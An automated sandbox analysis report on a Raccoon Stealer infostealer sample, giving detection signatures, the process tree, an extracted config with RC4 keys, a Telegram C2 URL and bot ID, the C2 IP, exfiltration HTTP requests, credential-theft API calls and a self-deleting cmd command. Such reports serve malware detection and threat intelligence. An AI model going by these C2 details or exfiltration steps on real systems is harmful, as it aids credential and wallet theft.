Windows Analysis Report 31cGYywxgy

Overview

General Information

Sample Name: 31cGYywxgy (renamed file extension from none to exe)
Analysis ID: 491712
MD5: 7739202a73e3f1c15f5f5e6f82434955
SHA1: cb0d64026ee41d99bf74a1b4939442eb53e4bd84
SHA256: 626999cdbd44d491c59a9fd35b302f3c18d4c0599c08b53b80716661b0e803ff
Tags: 32, exe, trojan

Detection

Raccoon
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Detected unpacking (overwrites its own PE header)
Yara detected Raccoon Stealer
Detected unpacking (changes PE section rights)
Machine Learning detection for sample
Self deletion via cmd delete
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Tries to steal Mail credentials (via file access)
Uses 32bit PE files
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains functionality to record screenshots
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Is looking for software installed on the system
PE file does not import any functions
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Binary contains a suspicious time stamp
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Process Tree

  • System is w10x64
  • 31cGYywxgy.exe (PID: 3104 cmdline: 'C:\Users\user\Desktop\31cGYywxgy.exe' MD5: 7739202A73E3F1C15F5F5E6F82434955)
    • cmd.exe (PID: 6524 cmdline: cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q 'C:\Users\user\Desktop\31cGYywxgy.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 6540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • timeout.exe (PID: 6608 cmdline: timeout /T 10 /NOBREAK MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
  • cleanup

Malware Configuration

Threatname: Raccoon Stealer

{"RC4_key2": "25ef3d2ceb7c85368a843a6d0ff8291d", "C2 url": "https://t.me/agrybirdsgamerept", "Bot ID": "5ff0ccb2bc00dc52d1ad09949e9c7663bc9ca4d4", "RC4_key1": "$Z2s`ten\\@bE9vzR"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp | JoeSecurity_Raccoon | Yara detected Raccoon Stealer | Joe Security |
00000000.00000003.257211865.0000000002220000.00000004.00000001.sdmp | JoeSecurity_Raccoon | Yara detected Raccoon Stealer | Joe Security |
00000000.00000002.282454454.0000000002120000.00000040.00000001.sdmp | JoeSecurity_Raccoon | Yara detected Raccoon Stealer | Joe Security |
Process Memory Space: 31cGYywxgy.exe PID: 3104 | JoeSecurity_Raccoon | Yara detected Raccoon Stealer | Joe Security |

Unpacked PEs

Source | Rule | Description | Author | Strings
0.2.31cGYywxgy.exe.400000.0.unpack | JoeSecurity_Raccoon | Yara detected Raccoon Stealer | Joe Security |
0.3.31cGYywxgy.exe.2220000.0.unpack | JoeSecurity_Raccoon | Yara detected Raccoon Stealer | Joe Security |
0.2.31cGYywxgy.exe.2120e50.1.unpack | JoeSecurity_Raccoon | Yara detected Raccoon Stealer | Joe Security |
0.3.31cGYywxgy.exe.2220000.0.raw.unpack | JoeSecurity_Raccoon | Yara detected Raccoon Stealer | Joe Security |
0.2.31cGYywxgy.exe.2120e50.1.raw.unpack | JoeSecurity_Raccoon | Yara detected Raccoon Stealer | Joe Security |

                    Sigma Overview

                    No Sigma rule has matched

                    Jbx Signature Overview

                    AV Detection:

                    Found malware configuration
                    Source: 0.2.31cGYywxgy.exe.400000.0.unpackMalware Configuration Extractor: Raccoon Stealer {"RC4_key2": "25ef3d2ceb7c85368a843a6d0ff8291d", "C2 url": "https://t.me/agrybirdsgamerept", "Bot ID": "5ff0ccb2bc00dc52d1ad09949e9c7663bc9ca4d4", "RC4_key1": "$Z2s`ten\\@bE9vzR"}
                    Multi AV Scanner detection for submitted file
                    Source: 31cGYywxgy.exeReversingLabs: Detection: 40%
                    Yara detected Raccoon Stealer
                    Source: Yara matchFile source: 0.2.31cGYywxgy.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.31cGYywxgy.exe.2220000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.31cGYywxgy.exe.2120e50.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.31cGYywxgy.exe.2220000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.31cGYywxgy.exe.2120e50.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.31cGYywxgy.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.257211865.0000000002220000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.282454454.0000000002120000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 31cGYywxgy.exe PID: 3104, type: MEMORYSTR
                    Machine Learning detection for sample
                    Source: 31cGYywxgy.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeCode function: 0_2_0042A130 lstrlenW,lstrlenW,lstrlenW,CredEnumerateW,CryptUnprotectData,LocalFree,CredFree,0_2_0042A130
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeCode function: 0_2_00429F5D CryptAcquireContextA,CryptCreateHash,lstrlenW,CryptHashData,CryptGetHashParam,wsprintfW,lstrcatW,wsprintfW,lstrcatW,CryptDestroyHash,CryptReleaseContext,lstrlenW,CryptUnprotectData,LocalFree,0_2_00429F5D
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeCode function: 0_2_0040E139 __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,LocalFree,CryptUnprotectData,0_2_0040E139
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeCode function: 0_2_00434A5F lstrlenW,lstrlenW,lstrlenW,CryptUnprotectData,LocalFree,lstrlenW,lstrlenW,lstrlenW,wsprintfA,lstrlenA,0_2_00434A5F

                    Compliance:

                    Detected unpacking (overwrites its own PE header)
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeUnpacked PE file: 0.2.31cGYywxgy.exe.400000.0.unpack
                    Source: 31cGYywxgy.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                    Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49742 version: TLS 1.2
                    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: freebl3.dll.0.dr
                    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\gfx\angle\targets\libEGL\libEGL.pdb source: libEGL.dll.0.dr
                    Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: api-ms-win-crt-locale-l1-1-0.dll.0.dr
                    Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: api-ms-win-crt-runtime-l1-1-0.dll.0.dr
                    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libprldap\prldap60.pdb source: prldap60.dll.0.dr
                    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb source: IA2Marshal.dll.0.dr
                    Source: Binary string: C:\xojine\siyi yovig6.pdb source: 31cGYywxgy.exe
                    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss3.pdb source: 31cGYywxgy.exe, 00000000.00000002.283125621.000000006E920000.00000002.00020000.sdmp, nss3.dll.0.dr
                    Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: api-ms-win-core-file-l1-2-0.dll.0.dr
                    Source: Binary string: ucrtbase.pdb source: ucrtbase.dll.0.dr
                    Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: api-ms-win-core-memory-l1-1-0.dll.0.dr
                    Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: api-ms-win-core-sysinfo-l1-1-0.dll.0.dr
                    Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: api-ms-win-crt-filesystem-l1-1-0.dll.0.dr
                    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdb source: ldap60.dll.0.dr
                    Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: api-ms-win-crt-stdio-l1-1-0.dll.0.dr
                    Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: api-ms-win-core-heap-l1-1-0.dll.0.dr
                    Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: api-ms-win-core-util-l1-1-0.dll.0.dr
                    Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: api-ms-win-core-synch-l1-1-0.dll.0.dr
                    Source: Binary string: vcruntime140.i386.pdbGCTL source: vcruntime140.dll.0.dr
                    Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: api-ms-win-crt-environment-l1-1-0.dll.0.dr
                    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: softokn3.dll.0.dr
                    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb source: nssckbi.dll.0.dr
                    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: 31cGYywxgy.exe, 00000000.00000002.282980746.000000006E819000.00000002.00020000.sdmp, mozglue.dll.0.dr
                    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: freebl3.dll.0.dr
                    Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: api-ms-win-core-processthreads-l1-1-0.dll.0.dr
                    Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: api-ms-win-crt-private-l1-1-0.dll.0.dr
                    Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: api-ms-win-crt-convert-l1-1-0.dll.0.dr
                    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\ipc\win\handler\AccessibleHandler.pdb source: AccessibleHandler.dll.0.dr
                    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: nssdbm3.dll.0.dr
                    Source: Binary string: XC:\xojine\siyi yovig6.pdb source: 31cGYywxgy.exe
                    Source: Binary string: msvcp140.i386.pdb source: msvcp140.dll.0.dr
                    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapihook\build\MapiProxy.pdb source: MapiProxy.dll.0.dr
                    Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: api-ms-win-core-profile-l1-1-0.dll.0.dr
                    Source: Binary string: ucrtbase.pdbUGP source: ucrtbase.dll.0.dr
                    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdbUU source: ldap60.dll.0.dr
                    Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: api-ms-win-crt-time-l1-1-0.dll.0.dr
                    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb66 source: nssckbi.dll.0.dr
                    Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: api-ms-win-core-handle-l1-1-0.dll.0.dr
                    Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: api-ms-win-core-synch-l1-2-0.dll.0.dr
                    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: softokn3.dll.0.dr
                    Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: api-ms-win-core-processenvironment-l1-1-0.dll.0.dr
                    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb<< source: IA2Marshal.dll.0.dr
                    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: 31cGYywxgy.exe, 00000000.00000002.282980746.000000006E819000.00000002.00020000.sdmp, mozglue.dll.0.dr
                    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\library\dummydll\qipcap.pdb source: qipcap.dll.0.dr
                    Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: api-ms-win-crt-conio-l1-1-0.dll.0.dr
                    Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: api-ms-win-core-localization-l1-2-0.dll.0.dr
                    Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: api-ms-win-crt-math-l1-1-0.dll.0.dr
                    Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: api-ms-win-core-processthreads-l1-1-1.dll.0.dr
                    Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: api-ms-win-core-namedpipe-l1-1-0.dll.0.dr
                    Source: Binary string: vcruntime140.i386.pdb source: vcruntime140.dll.0.dr
                    Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: api-ms-win-crt-multibyte-l1-1-0.dll.0.dr
                    Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: api-ms-win-crt-utility-l1-1-0.dll.0.dr
                    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapiDLL\mozMapi32.pdb source: mozMapi32.dll.0.dr
                    Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: api-ms-win-core-rtlsupport-l1-1-0.dll.0.dr
                    Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: api-ms-win-core-timezone-l1-1-0.dll.0.dr
                    Source: Binary string: msvcp140.i386.pdbGCTL source: msvcp140.dll.0.dr
                    Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: api-ms-win-core-string-l1-1-0.dll.0.dr
                    Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: api-ms-win-core-file-l2-1-0.dll.0.dr
                    Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: api-ms-win-crt-process-l1-1-0.dll.0.dr
                    Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: api-ms-win-core-libraryloader-l1-1-0.dll.0.dr
                    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldif\ldif60.pdb source: ldif60.dll.0.dr
                    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\config\external\lgpllibs\lgpllibs.pdb source: lgpllibs.dll.0.dr
                    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\msaa\AccessibleMarshal.pdb source: AccessibleMarshal.dll.0.dr
                    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: nssdbm3.dll.0.dr
                    Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: api-ms-win-core-interlocked-l1-1-0.dll.0.dr
                    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\crashreporter\injector\breakpadinjector.pdb source: breakpadinjector.dll.0.dr
                    Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: api-ms-win-crt-heap-l1-1-0.dll.0.dr
                    Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: api-ms-win-crt-string-l1-1-0.dll.0.dr
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeCode function: 0_2_0043EFDD FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,0_2_0043EFDD

                    Networking:

                    Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
                    Source: TrafficSnort IDS: 2033974 ET TROJAN Win32.Raccoon Stealer Data Exfil Attempt 192.168.2.5:49755 -> 194.180.174.100:80
                    C2 URLs / IPs found in malware configuration
                    Source: Malware configuration extractorURLs: https://t.me/agrybirdsgamerept
                    Source: Joe Sandbox ViewASN Name: MIVOCLOUDMD MIVOCLOUDMD
                    Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
                    Source: global trafficHTTP traffic detected: GET /agrybirdsgamerept HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: t.me
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Content-Length: 128Host: 194.180.174.100
                    Source: global trafficHTTP traffic detected: GET //l/f/G5GYJXwB3dP17Spz8m-L/d9a87544924531ef155dbccfe1a04e27038ca861 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 194.180.174.100
                    Source: global trafficHTTP traffic detected: GET //l/f/G5GYJXwB3dP17Spz8m-L/70e760d32c85dd68bb76b7cf4f9d65a400d87d16 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 194.180.174.100
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data, boundary=vD2tL1qC9bC3zV9eD9yX8dU8yY8lC1cVContent-Length: 1017Host: 194.180.174.100
                    Source: Joe Sandbox ViewIP Address: 194.180.174.100 194.180.174.100
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 27 Sep 2021 18:31:43 GMTContent-Type: application/octet-streamContent-Length: 2828315Connection: keep-aliveLast-Modified: Wed, 01 Sep 2021 16:21:39 GMTETag: "612fa893-2b281b"Accept-Ranges: bytes
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.180.174.100
                    Source: 31cGYywxgy.exe, 00000000.00000002.282856715.0000000002D2D000.00000004.00000001.sdmpString found in binary or memory: http://194.180.174.100/
                    Source: 31cGYywxgy.exe, 00000000.00000002.282340481.0000000000738000.00000004.00000001.sdmpString found in binary or memory: http://194.180.174.100//l/f/G5GYJXwB3dP17Spz8m-L/70e760d32c85dd68bb76b7cf4f9d65a400d87d16
                    Source: 31cGYywxgy.exe, 00000000.00000002.282340481.0000000000738000.00000004.00000001.sdmpString found in binary or memory: http://194.180.174.100//l/f/G5GYJXwB3dP17Spz8m-L/70e760d32c85dd68bb76b7cf4f9d65a400d87d167
                    Source: 31cGYywxgy.exe, 00000000.00000002.282340481.0000000000738000.00000004.00000001.sdmpString found in binary or memory: http://194.180.174.100//l/f/G5GYJXwB3dP17Spz8m-L/70e760d32c85dd68bb76b7cf4f9d65a400d87d16T
                    Source: 31cGYywxgy.exe, 00000000.00000002.282340481.0000000000738000.00000004.00000001.sdmpString found in binary or memory: http://194.180.174.100//l/f/G5GYJXwB3dP17Spz8m-L/d9a87544924531ef155dbccfe1a04e27038ca861
                    Source: 31cGYywxgy.exe, 00000000.00000002.282340481.0000000000738000.00000004.00000001.sdmpString found in binary or memory: http://194.180.174.100//l/f/G5GYJXwB3dP17Spz8m-L/d9a87544924531ef155dbccfe1a04e27038ca861ata
                    Source: 31cGYywxgy.exe, 00000000.00000003.276042748.0000000002D2A000.00000004.00000001.sdmpString found in binary or memory: http://194.180.174.100/Pv
                    Source: qipcap.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                    Source: 31cGYywxgy.exe, 00000000.00000002.282856715.0000000002D2D000.00000004.00000001.sdmp | String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord
                    Source: 31cGYywxgy.exe, 00000000.00000002.282340481.0000000000738000.00000004.00000001.sdmp | String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4842492154761;g
                    Source: 31cGYywxgy.exe, 00000000.00000002.282856715.0000000002D2D000.00000004.00000001.sdmp | String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=58648497779
                    Source: 31cGYywxgy.exe, 00000000.00000002.282340481.0000000000738000.00000004.00000001.sdmp | String found in binary or memory: https://contextual.media.net/checksync.php&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C
                    Source: 31cGYywxgy.exe, 00000000.00000002.282340481.0000000000738000.00000004.00000001.sdmp | String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
                    Source: 31cGYywxgy.exe, 00000000.00000002.282842619.0000000002D20000.00000004.00000001.sdmp | String found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:400
                    Source: nssckbi.dll.0.dr | String found in binary or memory: https://ocsp.quovadisoffshore.com0
                    Source: nssckbi.dll.0.dr | String found in binary or memory: https://repository.luxtrust.lu0
                    Source: 31cGYywxgy.exe, 00000000.00000002.282856715.0000000002D2D000.00000004.00000001.sdmp | String found in binary or memory: https://t..180.174.100/
                    Source: 31cGYywxgy.exe, 00000000.00000002.282842619.0000000002D20000.00000004.00000001.sdmp | String found in binary or memory: https://t.me/agrybirdsgamerept
                    Source: 31cGYywxgy.exe, 00000000.00000002.282842619.0000000002D20000.00000004.00000001.sdmp | String found in binary or memory: https://telegram.org/img/t_logo.png
                    Source: nssckbi.dll.0.dr | String found in binary or memory: https://www.catcert.net/verarrel
                    Source: nssckbi.dll.0.dr | String found in binary or memory: https://www.catcert.net/verarrel05
                    Source: qipcap.dll.0.dr | String found in binary or memory: https://www.digicert.com/CPS0
                    Source: 31cGYywxgy.exe, 00000000.00000002.282856715.0000000002D2D000.00000004.00000001.sdmp | String found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
                    Source: 31cGYywxgy.exe, 00000000.00000002.282856715.0000000002D2D000.00000004.00000001.sdmp | String found in binary or memory: https://www.microsoft.c
                    Source: unknown | HTTP traffic detected: POST / HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: text/plain; charset=UTF-8 Content-Length: 128 Host: 194.180.174.100
                    Source: unknown | DNS traffic detected: queries for: t.me
                    Source: global traffic | HTTP traffic detected: GET /agrybirdsgamerept HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: text/plain; charset=UTF-8 Host: t.me
                    Source: global traffic | HTTP traffic detected: GET //l/f/G5GYJXwB3dP17Spz8m-L/d9a87544924531ef155dbccfe1a04e27038ca861 HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: 194.180.174.100
                    Source: global traffic | HTTP traffic detected: GET //l/f/G5GYJXwB3dP17Spz8m-L/70e760d32c85dd68bb76b7cf4f9d65a400d87d16 HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: 194.180.174.100
                    Source: unknown | HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49742 version: TLS 1.2
                    Source: C:\Users\user\Desktop\31cGYywxgy.exe | Code function: 0_2_0042C157 __EH_prolog,GdiplusStartup,GetDesktopWindow,GetWindowRect,GetWindowDC,GetDeviceCaps,CreateCompatibleDC,CreateDIBSection,DeleteDC,DeleteDC,DeleteDC,SaveDC,SelectObject,BitBlt,RestoreDC,DeleteDC,DeleteDC,DeleteDC,GdipAlloc,GdipCreateBitmapFromHBITMAP,_mbstowcs,GdipSaveImageToFile,DeleteObject,GdiplusShutdown,0_2_0042C157

                    E-Banking Fraud:

                    Yara detected Raccoon Stealer
                    Source: Yara match | File source: 0.2.31cGYywxgy.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.3.31cGYywxgy.exe.2220000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.31cGYywxgy.exe.2120e50.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.3.31cGYywxgy.exe.2220000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.31cGYywxgy.exe.2120e50.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.31cGYywxgy.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000003.257211865.0000000002220000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.282454454.0000000002120000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: 31cGYywxgy.exe PID: 3104, type: MEMORYSTR
                    Source: 31cGYywxgy.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
                    Source: C:\Users\user\Desktop\31cGYywxgy.exe | Code function: String function: 0044F0F9 appears 31 times
                    Source: C:\Users\user\Desktop\31cGYywxgy.exe | Code function: String function: 00467790 appears 65 times
                    Source: 31cGYywxgy.exe, 00000000.00000002.282990135.000000006E822000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenamemozglue.dll8 vs 31cGYywxgy.exe
                    Source: 31cGYywxgy.exe, 00000000.00000002.283168894.000000006E95B000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenamenss3.dll8 vs 31cGYywxgy.exe
                    Source: 31cGYywxgy.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: 31cGYywxgy.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: 31cGYywxgy.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: 31cGYywxgy.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: C:\Users\user\Desktop\31cGYywxgy.exe | Section loaded: sqlite3.dll
                    Source: 31cGYywxgy.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: 31cGYywxgy.exe | ReversingLabs: Detection: 40%
                    Source: C:\Users\user\Desktop\31cGYywxgy.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: unknown | Process created: C:\Users\user\Desktop\31cGYywxgy.exe 'C:\Users\user\Desktop\31cGYywxgy.exe'
                    Source: C:\Users\user\Desktop\31cGYywxgy.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q 'C:\Users\user\Desktop\31cGYywxgy.exe'
                    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /T 10 /NOBREAK
                    Source: C:\Users\user\Desktop\31cGYywxgy.exe | File created: C:\Users\user\AppData\LocalLow\sqlite3.dll
                    Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@6/62@1/2
                    Source: C:\Users\user\Desktop\31cGYywxgy.exe | Code function: 0_2_0042A224 CoCreateInstance,StrStrIW,CoTaskMemFree,CoTaskMemFree,0_2_0042A224
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6540:120:WilError_01
                    Source: C:\Users\user\Desktop\31cGYywxgy.exe | Mutant created: \Sessions\1\BaseNamedObjects\user5L1M3_noturbusiness
                    Source: C:\Users\user\Desktop\31cGYywxgy.exe | File read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\Desktop\31cGYywxgy.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager
                    Source: C:\Users\user\Desktop\31cGYywxgy.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
                    Source: 31cGYywxgy.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: C:\xojine\siyi yovig6.pdb source: 31cGYywxgy.exe
                    Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: api-ms-win-core-interlocked-l1-1-0.dll.0.dr
                    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\crashreporter\injector\breakpadinjector.pdb source: breakpadinjector.dll.0.dr
                    Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: api-ms-win-crt-heap-l1-1-0.dll.0.dr
